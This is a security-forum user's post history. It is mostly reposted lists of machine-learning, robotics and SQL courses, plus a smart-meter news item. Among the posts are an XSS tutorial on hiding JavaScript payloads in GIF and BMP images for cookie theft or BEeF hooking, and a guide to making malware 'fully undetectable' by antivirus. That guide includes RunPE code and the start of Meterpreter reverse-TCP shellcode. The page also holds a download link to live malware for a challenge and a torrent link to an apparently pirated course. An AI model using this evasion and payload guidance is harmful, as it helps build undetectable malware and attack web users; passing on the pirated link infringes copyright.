Jump to content

Usr6

Active Members
  • Posts

    1337
  • Joined

  • Last visited

  • Days Won

    89

Everything posted by Usr6

  1. mai incearca
  2. @Shikata Nu ai de facut nicaieri brute, te-ar ajuta mult daca ti-ai da seama ce reprezinta numerele de identificare al oualelor
  3. 1. Machine Learning (FREE) Andrew Ng First, and arguably the most popular course on this list, Machine Learning provides a broad introduction to machine learning, data mining, and statistical pattern recognition. Topics include: Supervised learning (parametric/non-parametric algorithms, support vector machines, kernels, neural networks). Unsupervised learning (clustering, dimensionality reduction, recommender systems, deep learning). Best practices in machine learning (bias/variance theory; innovation process in machine learning and AI). The course will also draw from numerous case studies and applications, so that you’ll also learn how to apply learning algorithms to building smart robots (perception, control), text understanding (web search, anti-spam), computer vision, medical informatics, audio, database mining, and other areas. The course is 11 weeks long and averages a 4.9/5 user rating, currently. It is free to take, but you can pay $79 for a certificate upon course completion. 2. Machine Learning Foundations: A Case Study Approach (FREE) Carlos Guestrin, Emily Fox In Machine Learning Foundations: A Case Study Approach, you will get hands-on experience with machine learning from a series of practical case-studies. At the end of it you will have studied how to predict house prices based on house-level features, analyze sentiment from user reviews, retrieve documents of interest, recommend products, and search for images. Through hands-on practice with these use cases, you will be able to apply machine learning methods in a wide range of domains. By the end of this course, you will be able to: Identify potential applications of machine learning in practice. Describe the core differences in analyses enabled by regression, classification, and clustering. Select the appropriate machine learning task for a potential application. Apply regression, classification, clustering, retrieval, recommender systems, and deep learning. Represent your data as features to serve as input to machine learning models. Assess the model quality in terms of relevant error metrics for each task. Utilize a dataset to fit a model to analyze new data. Build an end-to-end application that uses machine learning at its core. Implement these techniques in Python. The course is 6 weeks long and requires about 5-8 hours of commitment per week. It currently averages a 4.6/5 user rating and is free to take, but you can pay $59 for a certificate upon completion. 3. Learning From Data (FREE) Yaser S. Abu-Mostafa Learning From Data is an introductory course in machine learning that will cover basic theory, algorithms, and applications. It balances theory and practice, and covers the mathematical as well as the heuristic aspects. The lectures follow each other in a story-like fashion: What is learning? Can a machine learn? How to do it? How to do it well? Take-home lessons. You’ll learn how to: Identify basic theoretical principles, algorithms, and applications of Machine Learning Elaborate on the connections between theory and practice in Machine Learning Master the mathematical and heuristic aspects of Machine Learning and their applications to real world situations The course is 10 weeks long and requires about 10 – 20 hours per week of commitment. It is free to take, but you can add a verified certificate of completion for $49. 4. Statistical Learning (FREE) Trevor Hastie, Rob Tibshirani This is an introductory-level course in supervised learning, with a focus on regression and classification methods. The syllabus includes: Linear and polynomial regression, logistic regression and linear discriminant analysis Cross-validation and the bootstrap, model selection and regularization methods (ridge and lasso) Nonlinear models, splines and generalized additive models Tree-based methods, random forests and boosting; support-vector machines Also, some unsupervised learning methods are discussed like principal components and clustering (k-means and hierarchical). This is not a math-heavy class and all computing is done in R. If you are not familiar with R that is ok. There are lectures devoted to R, giving tutorials from the ground up, and progressing with more detailed sessions that implement the techniques in each chapter. The class is free to take and is expected of you to commit 3 – 5 hours per week to work through the course material. If you complete the course, and achieve a passing grade of 50% on the quizzes. If you get 90% or higher, your statement will be “with distinction”. 5. Machine Learning: Regression (FREE) Carlos Guestrin, Emily Fox In Machine Learning: Regression, you will explore regularized linear regression models for the task of prediction and feature selection. You will be able to handle very large sets of features and select between models of various complexity. You will also analyze the impact of aspects of your data — such as outliers — on your selected models and predictions. To fit these models, you will implement optimization algorithms that scale to large datasets. By the end of this course, you will be able to: Describe the input and output of a regression model Compare and contrast bias and variance when modeling data Estimate model parameters using optimization algorithms Tune parameters with cross validation Analyze the performance of the model Describe the notion of sparsity and how LASSO leads to sparse solutions Deploy methods to select between models Exploit the model to form predictions Build a regression model to predict prices using a housing dataset Implement these techniques in Python The course requires 6 weeks of your time and approximately 5 – 8 hours per week to study the material. It’s current user rating averages a 4.8/5. The course is free to take, but you can pay $59 to receive a certificate of completion at the end. 6. Machine Learning: Classification (FREE) Carlos Guestrin, Emily Fox In Machine Learning: Classification, you will create classifiers that provide state-of-the-art performance on a variety of tasks. You will become familiar with the most successful techniques, which are most widely used in practice, including logistic regression, decision trees and boosting. In addition, you will be able to design and implement the underlying algorithms that can learn these models at scale, using stochastic gradient ascent. You will implement these technique on real-world, large-scale machine learning tasks. You will also address significant tasks you will face in real-world applications of ML, including handling missing data and measuring precision and recall to evaluate a classifier. This course is hands-on, action-packed, and full of visualizations and illustrations of how these techniques will behave on real data. By the end of this course, you will be able to: Describe the input and output of a classification model Tackle both binary and multiclass classification problems Implement a logistic regression model for large-scale classification Create a non-linear model using decision trees Improve the performance of any model using boosting Scale your methods with stochastic gradient ascent Describe the underlying decision boundaries Build a classification model to predict sentiment in a product review dataset Analyze financial data to predict loan defaults Use techniques for handling missing data Evaluate your models using precision-recall metrics Implement these techniques in Python (or in the language of your choice, though Python is highly recommended) The course is 7 weeks long and currently averages a 4.6/5 user rating. While the course materials are provided for free, you will need to pay $59 to earn a course completion certificate. 7. Machine Learning: Clustering & Retrieval (FREE) Carlos Guestrin, Emily Fox In Machine Learning: Clustering & Retrieval you will examine similarity-based algorithms for retrieval. You will also examine structured representations for describing the documents in the corpus, including clustering and mixed membership models, such as latent Dirichlet allocation (LDA). You will implement expectation maximization (EM) to learn the document clusterings, and see how to scale the methods using MapReduce. By the end of this course, you will be able to: Create a document retrieval system using k-nearest neighbors Identify various similarity metrics for text data Reduce computations in k-nearest neighbor search by using KD-trees Produce approximate nearest neighbors using locality sensitive hashing Compare and contrast supervised and unsupervised learning tasks Cluster documents by topic using k-means Describe how to parallelize k-means using MapReduce. Examine probabilistic clustering approaches using mixtures models Fit a mixture of Gaussian model using expectation maximization (EM) Perform mixed membership modeling using latent Dirichlet allocation (LDA) Describe the steps of a Gibbs sampler and how to use its output to draw inferences Compare and contrast initialization techniques for non-convex optimization objectives Implement these techniques in Python The course is 6 weeks in length and currently averages a 4.9/5 user rating. The course materials are free, but you’ll need to pay $59 if you want a course completion certificate. 8. Unsupervised Machine Learning Hidden Markov Models in Python ($50) Justin C While the current fad in deep learning is to use recurrent neural networks to model sequences, this course will introduce you to a machine learning algorithm that has been around for several decades now – the Hidden Markov Model. In Unsupervised Machine Learning Hidden Markov Models in Python, you’ll learn to measure the probability distribution of a sequence of random variables. In this course you’ll learn: How to use gradient descent to solve for the optimal parameters of an HMM, as an alternative to the popular expectation-maximization algorithm. How to work with sequences in Theano, a popular library for deep learning How to look at a model of sickness and health, and calculate how to predict how long you’ll stay sick, if you get sick How Markov models can be used to analyze how people interact with your website, and fix problem areas like high bounce rate, which could be affecting your SEO Practical applications of Markov models, including generating images, smartphone autosuggestions, and using HMMs to answer one of the most fundamental questions in biology – how is DNA, the code of life, translated into physical or behavioral attributes of an organism? The course is comprised of 35 videos and runs a total time of 4 hours. It currently averages a 4.7/5 user rating. However, the course is not free, it costs $50. 9. Data Science and Machine Learning with Python – Hands On! ($35) Frank Kane If you’ve got some programming or scripting experience, Data Science and Machine Learning with Python – Hands On! will teach you the techniques used by real data scientists in the tech industry – and prepare you for a move into this hot career path. This comprehensive course includes 68 lectures spanning almost 9 hours of video, and most topics include hands-on Python code examples you can use for reference and for practice. The topics in this course come from an analysis of real requirements in data scientist job listings from the biggest tech employers. It covers the machine learning and data mining techniques real employers are looking for, including: Regression analysis K-Means Clustering Principal Component Analysis Train/Test and cross validation Bayesian Methods Decision Trees and Random Forests Multivariate Regression Multi-Level Models Support Vector Machines Reinforcement Learning Collaborative Filtering K-Nearest Neighbor Bias/Variance Tradeoff Ensemble Learning Term Frequency / Inverse Document Frequency Experimental Design and A/B Tests The course costs $35 and currently has an average user rating of 4.6/5. 10. Machine Learning for Data Science and Analytics (FREE) Ansaf Salleb-Aouissi, Cliff Stein, David Blei, Itsik Peer, Mihalis Yannakakis, Peter Orbanz Machine Learning for Data Science and Analytics is an introduction to machine learning and algorithms. You will develop a basic understanding of the principles of machine learning and derive practical solutions using predictive analytics. You will also examine why algorithms play an essential role in Big Data analysis. In this course, you’ll learn: What machine learning is and how it is related to statistics and data analysis How machine learning uses computer algorithms to search for patterns in data How to use data patterns to make decisions and predictions with real-world examples from healthcare involving genomics and preterm birth How to uncover hidden themes in large collections of documents using topic modeling How to prepare data, deal with missing data and create custom data analysis solutions for different industries Basic and frequently used algorithmic techniques including sorting, searching, greedy algorithms and dynamic programming The course is 5 weeks and requires a commitment of 7-10 hours per week. It is free, but you have the option of paying $99 for a verified certificate of completion. Sursa: https://hackerlists.com/beginner-ml-courses/
      • 2
      • Upvote
  4. 1. Introduction to Autonomous Mobile Robots (edX) The objective of Introduction to Autonomous Mobile Robots is to provide the basic concepts and algorithms required to develop mobile robots that act autonomously in complex environments. The main emphasis is put on mobile robot locomotion and kinematics, environment perception, probabilistic map based localization and mapping, and motion planning. The lectures and exercises of this course introduce several types of robots such as wheeled robots, legged robots and drones. 2. Underactuated Robotics (edX) Underactuated Robotics is taught by Russ Tedrake, Robin Deits and Twan Koolen. It is comprised of 19 lectures covering algorithms for walking, running, swimming, flying, and manipulation and the prerequisites for this course include basic linear algebra and differential equations. 3. Introduction to Robotics (MIT) Introduction to Robotics, taught by Harry Asada and John Leonard, provides an overview of robot mechanisms, dynamics, and intelligent controls. Topics include planar and spatial kinematics, and motion planning; mechanism design for manipulators and mobile robots, multi-rigid-body dynamics, 3D graphic simulation; control design, actuators, and sensors; wireless networking, task modeling, human-machine interface, and embedded software. 4. Control of Mobile Robots (Coursera) Control of Mobile Robots, taught by Magnus Egerstedt, is a course that focuses on the application of modern control theory to the problem of making robots move around in safe and effective ways. The structure of this class is somewhat unusual since it involves many moving parts – to do robotics right, one has to go from basic theory all the way to an actual robot moving around in the real world, which is the challenge this course has set out to address. 5. Robot Mechanics and Control, Part I (edX) Robot Mechanics and Control, Part I provides a mathematical introduction to the mechanics and control of robots that can be modeled as kinematic chains. Topics covered include the concept of a robot’s configuration space and degrees of freedom, static grasp analysis, the description of rigid body motions, kinematics of open and closed chains, and the basics of robot control. 6. Robot Mechanics and Control, Part II (edX) Robot Mechanics and Control, Part II covers screw motions and the product of exponentials kinematics formula, inverse kinematics of open chains, velocity kinematics and statics, closed chain kinematics, and basics of robot control. 7. Autonomous Navigation for Flying Robots (edX) Autonomous Navigation for Flying Robots introduces the basic concepts for autonomous navigation for quadrotors. The following topics will be covered: 3D geometry, probabilistic state estimation, visual odometry, SLAM, 3D mapping, linear control. In particular, you will learn how to infer the position of the quadrotor from its sensor readings and how to navigate it along a trajectory. 8. Artificial Intelligence for Robotics (Udacity) Artificial Intelligence for Robotics teaches you how to program all the major systems of a robotic car from the leader of Google and Stanford’s autonomous driving teams. You will learn basic methods in Artificial Intelligence, including: probabilistic inference, planning and search, localization, tracking and control, all with a focus on robotics. Extensive programming examples and assignments will apply these methods in the context of building self-driving cars. 9. Robotic vision (QUT) Robotic vision introduces you to the field of computer vision and the mathematics and algorithms that underpin it. You’ll learn how to interpret images to determine the color, size, shape and position of objects in the scene, and you’ll build an intelligent vision system that can recognize objects of different colors and shapes. 10. Applied Robot Design for Non-Robot-Designers (Stanford) In Applied Robot Design for Non-Robot-Designers you will learn how to design and build the mechanical hardware of robots. The goal is to take people with no mechanical experience and teach them to build professional-quality robots. The course consists of weekly labs and a final project, each of which will entail building an interesting robotic device. For example, students will build a pantilt camera turret in the belts lab. Topics will include: Electric motors, unusual actuators, sensors, mechanical transmissions, rotary and linear motion, counterbalancing, and standard mechanisms. 11. Introduction to Robotics (Stanford) The purpose of Introduction to Robotics is to introduce you to basics of modeling, design, planning, and control of robot systems. In essence, the material treated in this course is a brief survey of relevant results from geometry, kinematics, statics, dynamics, and control. 12. Introduction to Robotics Specialization (University of Pennsylvania) The Introduction to Robotics Specialization introduces you to the concepts of robot flight and movement, how robots perceive their environment, and how they adjust their movements to avoid obstacles, navigate difficult terrains and accomplish complex tasks such as construction and disaster recovery. You will be exposed to real world examples of how robots have been applied in disaster situations, how they have made advances in human health care and what their future capabilities will be. The courses build towards a capstone in which you will learn how to program a robot to perform a variety of movements such as flying and grasping objects. Sursa: https://hackerlists.com/online-robotics-courses/
      • 3
      • Upvote
  5. Database Fundamentals Type: Video Lessons Level: Beginner Price: Free Before diving into writing SQL queries, it’s useful to get the 10,000 foot conceptual overview, learn some terminology, and see some examples of relational database tables. Database Fundamentals is a five-part video introduction to core database concepts (by two SQL pros) that explains SQL databases from square one using a mix of lecture content and screencasting. It’s a good place to start for anyone who’s a true beginner or looking to review the fundamental concepts of databases. Stanford’s Self Paced SQL Mini Courses Type: Video Lessons Level: Beginner, Intermediate Price: Free Stanford offers several free SQL mini courses with in-video quizzes and interactive programming exercises that are auto-checked. Every course has a discussion forum and references outside readings & resources. The course material draws from Stanford’s undergraduate courses. essentialSQL Type: Video Lessons, Articles, Community Level: Any Price: Free & Paid Kris Wenzel, creator of essentialSQL, has created a resource rich site. He recommends that you start with his free video course, or dive into some of his beginner text based lessons listed here. There are many thorough text based lessons on the homepage, as well as a learning community. SQL Authority – Video Learning Type: Video Lessons Level: Any, Intermediate Price: Free The owner of SQL Authority, Pinal Dave, is a tech enthusiast and independent consultant that has published 21 courses on Pluralsight and written 11 books on SQL Server. His blog has more articles and videos than you could probably ever get through. Many of the videos are on specific topics that are well beyond beginner level. SQL Server Tutorial for Beginners Type: Video Lesson Level: Beginner, Intermediate Price: Free A treasure trove of 135 short videos showing SQL database concepts using Microsoft SQL Server and SQL Server Management Studio. Pragim Technologies has video lessons of many other languages on their YouTube channel as well. SQL Server Central – Foreign Keys Part 1 & Part 2 Type: Video Lessons Level: Intermediate Price: Free The first big hurdle when learning SQL is understanding the significance of foreign keys and how to use them. These two short videos will give you a background in referential integrity. There are many other videos and resources on SQL Server Central, and although some may look a little dated, the basics of SQL haven’t changed much over the years so they’re still relevant. Microsoft Virtual Academy – SQL Server Courses Type: Video Lessons Level: Any Price: Free Designing Solutions for SQL Server and Developing Microsoft SQL Server Databases are two of the courses offered by Microsoft Virtual Academy. The two courses, as well as others at MVA, offer training on how to implement and manage database solutions, migrate to scalable cloud solutions, use powerful reporting, and integrate SQL with Sharepoint. Sursa: https://hackerlists.com/learn-sql-online/
      • 2
      • Upvote
  6. Name: Iepurasul_cel_viteaz.jpg SHA-1: 473F7236DA2AE45FB56A9DDAAB25B1287762B624 Iepurasii viteji: 1. @pr00f 2. @Hertz 3. @sandabot
  7. In this course, you will learn all of the old and modern security systems that have been used and are currently being used. You also learn how to crack each one and understand why certain security systems are weak and why others are strong. We will even go into RSA, AES and ECC which are the three main modern cryptosystems used today. Learn How to Crack the Code! Advanced Encryption Standard Public Key Cryptosystems (ie RSA) Elliptic Curve Cryptography Modern Cryptographic Security Advanced Mathematical Techniques Master the Art of Security! Security is a very important tool, and the ability to use mathematics to hide information is vital to the world. See how our banks and even the National Security Agency (NSA) keeps their data secure. With the knowledge of this course, you can even apply for security jobs at places like the NSA! This is a course that is rarely taught in Universities, so take advantage and start today! Most of today's security is based upon RSA, and AES but the NSA is trying to push Elliptic Curve Cryptography since it is more secure than RSA. In this course, we learn all of these cryptosystems and their weaknesses. We give examples of every cipher that we cover. Only a small number of people currently understand these systems, and you can join them. The best part of this course is the fun in breaking the codes. We offer many examples of each cryptosystem and how to break each one. Even as you are reading this, your https:// at the top says that the RSA Algorithm is successfully keeping your information from flooding the internet. You can find out how it all works and the mathematical structures that keep it secure in this course. So what are you waiting for? Who is the target audience? Anyone interested in computers and security Anyone who wants to work at the National Security Agency Anyone who understands a little about mathematics Anyone who wants to understand why certain systems are secure Download: magnet:?xt=urn:btih:303714e54be3a7d973b7c20b31225366de667026&dn=Cryptography%20And%20Math%20Security%20Crack%20The%20Code pass:"www.descargasnsn.com" Sursa: http://certcollection.org/forum/topic/311373-udemy-cryptography-and-math-security-crack-the-code-torrent/
  8. Material Introduction Section 1) Fundamentals Section 2) Malware Techniques Section 3) RE Tools Section 4) Triage Analysis Section 5) Static Analysis Section 6) Dynamic Analysis Sursa: https://securedorg.github.io/RE101/
  9. Usr6

    Udemy

    Bug Bounty : Web Hacking Description In this course you will learn how to hack facebook, google, paypal type of web application, you will not just learn hacking them, you will even learn how to earn from hacking them and its all 100% legal, Earning by hacking legally is known as bug bounty program, 250+ companies have bug bounty program, Facebook paid 5 million to hackers, Google paid over $6 million and many others do pay. One earns millions to 100,000$/month, so basically bug bounty program is where hackers get paid for hacking and disclosing bugs to parent company, if you want to earn by hacking means this course is for you, this course will help you to get started in bug bounty program. what all instructor have covered in this course: first tools: Burp Suite, Browser Plugins, Lots of software in Kali Linux OS after that all types of vulnerability: SQL, XSS, CSRF injection and many more then finally methodology of doing bug bounty so that's all in this course this much is enough to learn to begin with bug bounty if you want to be one among those ethical hackers then enroll into my course "Bug Bounty: Web hacking" now! https://www.udemy.com/bug-bounty-web-hacking/?couponCode=FREE_TEMP
  10. Introduction Cross Site Scripting is one of the most common and powerful vulnerabilities on the Web. The OWASP organization has classified it in the third place in the top ten of the most critical web applications vulnerabilities (OWASP Top 10 – 2013: https://www.owasp.org/index.php/Top_10_2013-Top_10 ) Figure 1: OWASP TOP 10 – 2013 The cross-site scripting attack is an attack on web applications which allow a hacker to inject malicious scripts to perform malicious actions. The malicious script is executed on the browser side, which makes this attack very powerful and critical. You can have more information about the attack with some good articles here: http://resources.infosecinstitute.com/deadly-consequences-XSS/ Alternatively, here: http://resources.infosecinstitute.com/cross-site-scripting-XSS/ In this article, we will discuss how can we use an image to perform XSS attacks from simple to advanced exploitation. Let’s go deeper Let’s pretend we want to inject a JS script directly, how can we do it? You have to know that if the webmaster/administrator of a platform permits execution of JS scripts from the same domain. If so, we can exploit that! The target just has to have a WYSIWYG editor that permit writing HTML code and downloading images. This is sufficient for a hacker to create a script and inject it into an image, or create an image with an injected payload. What’s a payload? Simply, It is a script that executes malicious actions. Before going deeper into the exploitation, I advise you to read the articles related to these vulnerabilities that I shared with you at the beginning of the article Now imagine that we can exploit XSS with an image. Can we insert it as a comment on an Article? A Blog? With a BEeF hook or another exploitation framework? The results would be chaotic. Now, How Can We Do It? For the exploitation, you will need this script to inject JavaScript into a gif: http://pastebin.com/6yUbfGX5 and this one is for bmp ones: http://pastebin.com/04y7ee3u The two scripts are developed with Python; the most important parts are: The part that handles the opening of an open a valid GIF header in Python with \x2A\x2F (aka *\). Figure 2: The part of the exploit that handles the creation of a valid GIF Header If you open a gif image with a Hexadecimal editor, you can see in the metadata GIF89a, which verify the validity of our exploit. Figure 3: Hexadecimal Editor You can have more information here: http://giflib.sourceforge.net/whatsinagif/bits_and_bytes.html Moreover, the part that handles the injecting of the payload: Figure 4: The part of the exploit that handles the injection of the payload Finally, The Exploitation Once you have downloaded the script, tape the following command that permits one to adapt the execution of the script into the Linux environment (the environment used is Kali Linux) Figure 5: Adaptation of the script into Unix environment Then, let’s inject our test script into the image with the following command (we will do the test with a gif image so that we will use the gif injector script ➔ The first one). This is just a simple payload that will show you a JavaScript alert with the message “Learn XSS with gif,” but in a real scenario, an attacker will try to steal your cookie, inject hook (like BEeF one), redirect you to a malicious site such as: Figure 6: Injection of the XSS payload into the gif image The result image will change from [image_name].gif to [image_name]_malw.gif. Now we have injected our script into our image; we can use it as an HTML page with the following script, that is automatically generated: Figure 6: HTML Script to execute the image The image and script source is the output image. Now let’s copy all the content of the directory, and put it into the /var/www directory, then run the apach2 service: Figure 7: Starting APACH2 service Then run the HTML page into your browser and SURPRISE: Figure 8: Execution of the injected XSS payload We can also exploit with a redirection like this: Figure 9: Injection of redirection payload We can also do it in C or ASM, not just in with Python; you can have more information there: https://github.com/jklmnn/imagejs https://gist.github.com/ajinabraham/f2a057fb1930f94886a3 We can also use it with BEeF, which allows to a hacker a golden door to your browser. You can see related article to this powerful framework here: http://resources.infosecinstitute.com/beef-part-1/ How to prevent it The prevention of this type of exploitation is very difficult, but you can provide it with the following points: Always filter user input Use whitelist for the elements loaded, even if it is from the same domain Use high-level models: MVC, PEAR, SRUTS… Use a token based system Moreover, always remember never to let the user write into HTML anywhere on your platform, it is the most important thing. Conclusion The XSS vulnerability is one of the most powerful vulnerabilities on the web, so never underestimate it and never forget that it can be exploited not just with a vulnerable URL, but also can be injected into content like images like we just saw. In the next articles, we will discover how we can exploit XSS into applications and some advanced exploitations. Always remember: Never trust user input Sursa: http://resources.infosecinstitute.com/exploit-xss-image/
      • 5
      • Upvote
  11. Lab tests carried out by Dutch scientists have shown that some of today's "smart" electrical meters may give out false readings that in some cases can be 582% higher than actual energy consumption. The study involved several tests conducted on nine different brands of "smart" meters, also referred to in the industry as "static energy meters." Researchers also used one electromechanical meter for reference. Using a simple test rig, portrayed above, researchers connected the smart meters to various power-consuming appliances found in regular homes, such as energy saving light bulbs, heaters, LED bulbs, and dimmers. Tests lasted for six months Experiments went on for six months, with individual tests lasting at least one week, and sometimes several weeks. Researchers tried to reproduce regular household energy consumption patterns and didn't focus on putting the smart meters to stressful conditions. The study was conducted by researchers from the University of Twente and the Amsterdam University of Applied Sciences. As such, the meters were chosen to represent the installed base of energy meters in the Netherlands. Meters used in the tests were manufactured between 2004 and 2014. Test results varied wildly, with some meters reporting errors way above their disclosed range, going from -32% to +582%. Tests with uncommon results were repeated several times and the results were within a few percents of the original. Test results matched user complaints The results of their study matched numbers posted on an online forum by a disgruntled Dutchman complaining about high energy bills. Overall, five of the nine smart meters gave out readings much higher than the actual amount of power consumed, while two gave lower readings. The greatest inaccuracies were seen when researchers combined dimmers with energy saving light bulbs and LED bulbs. After finishing their lab experiment, researchers dismantled the smart meters to understand the problem. Following their efforts, the three-man research team discovered that smart meters which gave abnormally high readings used a Rogowski Coil in their setup, while the smart meters that gave out low readings used Hall effect-based sensors. Problems blamed on smart meter designs Researchers blamed all the issues on the design of some smart meters, and, ironically, electrical devices with energy-saving features. The latter devices, researchers say, introduced a large amount of noise in electrical current waveforms, which disrupt the smart meter sensors tasked with recording power consumption. "The reason for faulty readings appears to be the current sensor, and the associated circuitry," said researchers. "The experimental results [...] show that static energy meters can be pushed into faulty reading (positive and negative) if sufficiently fast pulsed currents are drawn by the consumer." Up to 750,000 faulty smart meters in the Netherlands alone Since the research only covered smart meters commonly installed in Dutch homes, researchers say that around 750,000 smart meters deployed around the Netherlands may be giving out false readings. Worldwide, the numbers of possibly faulty smart meters could be in the millions, especially after some governments, especially in the EU, have pushed for smart meters to replace classic electromechanical (rotating disk) meters. The true impact cannot be assessed, as researchers did not publish the names, makes, and models of the tested smart meters. The research team's work, titled "Static Energy Meter Errors Caused by Conducted Electromagnetic Interference," has been published in the IEEE Electromagnetic Compatibility Magazine. Sursa: https://www.bleepingcomputer.com/news/hardware/millions-of-smart-meters-may-over-inflate-readings-by-up-to-600-percent/
      • 2
      • Upvote
      • Downvote
  12. Usr6

    Fun stuff

  13. https://www.ossblog.org/master-c-programming-with-open-source-books/
  14. Acest challenge contine malware real. Rulati doar in masini virtuale(virtualbox, vmware, etc) izolate, fara access la retea. p.s. Programele de tip sandbox nu prezinta siguranta - testat Download: h t t p : / / g e . t t / 7 T V l L m i 2 Parola: dezarhivez un malware Challenge realizat in colaborare cu @Gecko Au rezolvat challenge-ul: @sclipici
  15. AZW-QLJ
  16. Syllabus Section: Preliminary Skills - Prerequisites Module 1 : Introduction Module 2 : Networking Module 3 : Web Applications Module 4 : Penetration Testing Section: Preliminary Skills - Programming Module 1 : C++ Module 2 : Python Section: Penetration Testing Module 1 : Information Gathering Module 2 : Footprinting & Scanning Module 3 : Vulnerability Assessment Module 4 : Web Attacks Module 5 : System Attacks Module 6 : Network Attacks Invitatie: https://www.elearnsecurity.com/affiliate/redeem?code=RYW-AIK
  17. This blog post will explain effective methods for bypassing the static, dynamic and heuristic analysis of up to date anti virus products. Some of the methods are already known by public but there are few methods and implementation tricks that is the key for generating FUD (Fully Undetectable) malware, also the size of the malware is almost as important as anti detection, when implementing these methods i will try to keep the size as minimum as possible. this paper also explains the inner workings of anti viruses and windows operating system, reader should have at least intermediate C/C++ and assembly knowledge and decent understanding of PE file structure. Introduction Implementing anti detection techniques should be specific for each malware type, all the methods explained in this paper will also work for all kind of malware but this paper mainly focuses on stager meterpreter payloads because meterpreter is capable of all the things that all other malware does, getting a meterpreter session on remote machine allows many things like privilege escalation, credential stealing, process migration, registry manipulation and allot more post exploitation, also meterpreter has a very active community and it’s very popular among security researchers. Terminology Signature Based Detection: Traditional antivirus software relies heavily upon signatures to identify malware. Substantially, when a malware arrives in the hands of an antivirus firm, it is analysed by malware researchers or by dynamic analysis systems. Then, once it is determined to be a malware, a proper signature of the file is extracted and added to the signatures database of the antivirus software.[1] Static Program Analyze: Static program analysis is the analysis of computer software is performed without actually executing programs. In most cases the analysis is performed on some version of the source code, and in the other cases, some form of the object code.[2] Dynamic Program Analyze: Dynamic program analysis is the analysis of computer software that is performed by executing programs on a real or virtual processor. For dynamic program analysis to be effective, the target program must be executed with sufficient test inputs to produce interesting behavior.[3] Sandbox: In computer security, a sandbox is a security mechanism for separating running programs. It is often used to execute untested or untrusted programs or code, possibly from unverified or untrusted third parties, suppliers, users or websites, without risking harm to the host machine or operating system.[4] Heuristic Analysis: Heuristic analysis is a method employed by many computer antivirus programs designed to detect previously unknown computer viruses, as well as new variants of viruses already in the “wild”.Heuristic analysis is an expert based analysis that determines the susceptibility of a system towards particular threat/risk using various decision rules or weighing methods. MultiCriteria analysis (MCA) is one of the means of weighing. This method differs from statistical analysis, which bases itself on the available data/statistics.[5] Entropy: In computing, entropy is the randomness collected by an operating system or application for use in cryptography or other uses that require random data. This randomness is often collected from hardware sources, either pre-existing ones such as mouse movements or specially provided randomness generators. A lack of entropy can have a negative impact on performance and security.[6] Common Techniques When it comes to reducing a malware’s detection score first things that comes in mind are crypters, packers and code obfuscation. These tools and techniques are still able to bypass good amount of AV product but because of the advancements in cyber security field most of the tools and methods in the wild is outdated and can’t produce FUD malware. For understanding the inner workings of these techniques and tools i will give brief descriptions; Obfuscation: Code obfuscation can be defined as mixing the source code of the binary without disrupting the real function, it makes static analyzing harder and also changes the hash signatures of the binary. Obfuscation can simply be implemented with adding few lines of garbage code or programmatically changing the execution order of the instructions. This method can bypass good amount of AV product but it depends on how much you obfuscate. Packers: Executable packer is any means of compressing an executable file and combining the compressed data with decompression code into a single executable. When this compressed executable is executed, the decompression code recreates the original code from the compressed code before executing it. In most cases this happens transparently so the compressed executable can be used in exactly the same way as the original. When a AV scanner scans a packed malware it needs to determine the compression algorithm and decompress it. Because of files that packed with packers are harder to analyze malware authors have a keen interest on packers. Crypters: Crypters are programs that encrypts the given binary for making it hard to analyze or reverse engineer. A crypter exists of two parts, a builder and a stub, builder simply just encrypts the given binary and places inside the stub, stub is the most important piece of the crypter, when we execute the generated binary first stub runs and decrypts the original binary to memory and then executes the binary on memory via “RunPE” method(in most cases). The Problem About Crypters & Packers Before moving on to the effective methods, there are few things that needs to be acknowledged about what is wrong in well known techniques and tools. Today’s AV companies has already realized the danger, now instead of just searching for malware signatures and harmful behavior they also search for signs of crypters and packers. Compared to detecting malware, detecting crypters and packers is relatively easy because of they all have to do certain suspicious things like decrypting the encrypted PE file and executing it on the memory. PE Injection: In order to fully explain the in memory execution of a PE image i have to talk about how windows loads the PE files. Generally when compiling a PE file the compiler sets the main module address at 0x00400000, while compile process all the full address pointers and addresses at long jump instructions are calculated according to main module address, at the end of compiling process compiler creates a relocation table section in PE file, relocation section contains the addresses of instructions that depends on the base address of the image, such as full address pointers and long jump instruction. While in execution of the PE image, operating system checks the availability of the PE image’s preferred address space, if the preferred space is not available, operating system loads the PE image to a random available address on memory, before starting the process system loader needs to adjust the absolute addresses on memory, with the help of relocation section system loader fixes the all address dependent instructions and starts the suspended process. All this mechanism is called “Address Layout Randomization”.[7] In order to execute a PE image on memory crypters needs to parse the PE headers and relocate the absolute addresses, simply they have to mimic system loader witch is very unusual and suspicious. When we analyze crypters written in c or higher level languages in almost every cases we could see these windows API functions called “NtUnmapViewOfSection” and “ZwUnmapViewOfSection” these functions simply unmaps a view of a section from the virtual address space of a subject process, they play a very important role at in memory execution method called RunPE which almost %90 of crypters uses. xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection")); xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase)); Of course AV products can’t just declare malicious for every program that uses these windows API functions, but the order of using this functions matter a lot. There are small percentage of crypters(mostly written in assembly) witch does not uses these functions and performs the relocation manually, they are very effective at the time but sooner or later usage of crypters will not be profitable because of logically no non harmful program tries to mimic the system loader. Another downside is huge entropy increase on input files, because of encrypting the entire PE file, entropy will rise inevitably, when AV scanners detects unusual entropy on a PE file they will probably mark the file as suspicious. Perfect Approach The concept of encrypting the malicious code is clever but the decryption function should be obfuscated properly and when it comes to executing the decrypted code in memory we have to do it without relocating the absolute addresses, also there has to be a detection mechanism checking for weather the malware is analyzing dynamically in a sand box or not, if detection mechanism detects that malware is being analyzed by the AV then the decryption function shouldn’t be executed. Instead of encrypting the entire PE file encrypting shellcodes or only the .text section of the binary is much more suitable, it keeps the entropy and size low and makes no changes to image headers and sections. This will be the malware flow chart. Our “AV Detect.” function will detect if the malware is being analyze dynamically in a sandbox or not, if the function detects any sign of AV scanner then it will call the main function again or just crash, if “AV Detect” function don’t finds any sign of AV scanner it will call the “Decrypt Shellcode” function This is meterpreter reverse tcp shellcode in raw format. unsigned char Shellcode[] = { 0xfc, 0xe8, 0x82, 0x00, 0x00, 0x00, 0x60, 0x89, 0xe5, 0x31, 0xc0, 0x64, 0x8b, 0x50, 0x30, 0x8b, 0x52, 0x0c, 0x8b, 0x52, 0x14, 0x8b, 0x72, 0x28, 0x0f, 0xb7, 0x4a, 0x26, 0x31, 0xff, 0xac, 0x3c, 0x61, 0x7c, 0x02, 0x2c, 0x20, 0xc1, 0xcf, 0x0d, 0x01, 0xc7, 